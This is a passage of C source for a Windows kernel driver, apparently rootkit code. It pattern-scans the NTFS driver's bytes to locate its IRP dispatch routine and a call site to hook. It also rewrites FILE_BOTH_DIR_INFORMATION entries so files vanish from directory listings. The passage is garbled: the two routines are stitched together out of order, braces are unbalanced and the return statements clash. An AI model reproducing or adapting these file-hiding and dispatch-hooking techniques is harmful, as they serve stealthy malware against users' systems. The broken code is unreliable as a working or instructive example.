(FileContent[i+2]==0x68))
{
OldIrpDispatchRoutine=*(DWORD*)(&FileContent[i+3]);
break;
}
}
ExFreePoolWithTag(FileContent,0);
if (OldIrpDispatchRoutine)
{
FileContent2=ExAllocatePoolWithTag(NonPagedPool,0x100,0);
if (!FileContent2)
return result;
RtlZeroMemory((PUCHAR)FileContent2,0x100);
NtfsCodestartAddress =
OldIrpDispatchRoutine - ImageBase;
byteOffset.LowPart = NtfsCodestartAddress;
byteOffset.HighPart= 0x0;
currentDirInfo->NextEntryOffset =0;
break;
}
else
{
// Move the pointer forward, bearing in mind that the entries form a linked list of files
int iPos=((ULONG)currentDirInfo) -
(ULONG)((PFILE_BOTH_DIR_INFORMATION)buf);
int iLeft=(ULONG)*lpBufLenth - iPos -
currentDirInfo->NextEntryOffset;
RtlCopyMemory((PVOID)currentDirInfo,(PVOID)( (char*)currentDirInfo+curre
ntDirInfo->NextEntryOffset ),(ULONG)iLeft);
continue;
}
}
lastDirInfo = currentDirInfo;
currentDirInfo =
(PFILE_BOTH_DIR_INFORMATION)((char*)currentDirInfo+currentDirInfo->NextE
ntryOffset);
} while(!bLastOne);
return;
}
status =
ZwReadFile(hFile,NULL,NULL,NULL,&iosb,FileContent2,0x100,&byteOffset,NUL
L);
if (NT_SUCCESS(status))
{
i=0;
while (i<0x100)
{
if
((FileContent2[i]==0xFF)&&(FileContent2[i+1]==0x75)&&(FileContent2[i+2]=
=0xE4)&&(FileContent2[i+3]==0xE8))
{
CallHooK =
*(DWORD*)(&FileContent2[i+4]);
CallHooK+=8;
CallHooK+=i;
break;
}
i++;
}
ExFreePoolWithTag(FileContent2,0);
result = NtfsCodestartAddress+CallHooK;
ZwClose(hFile);
return result;
}
}
}
} |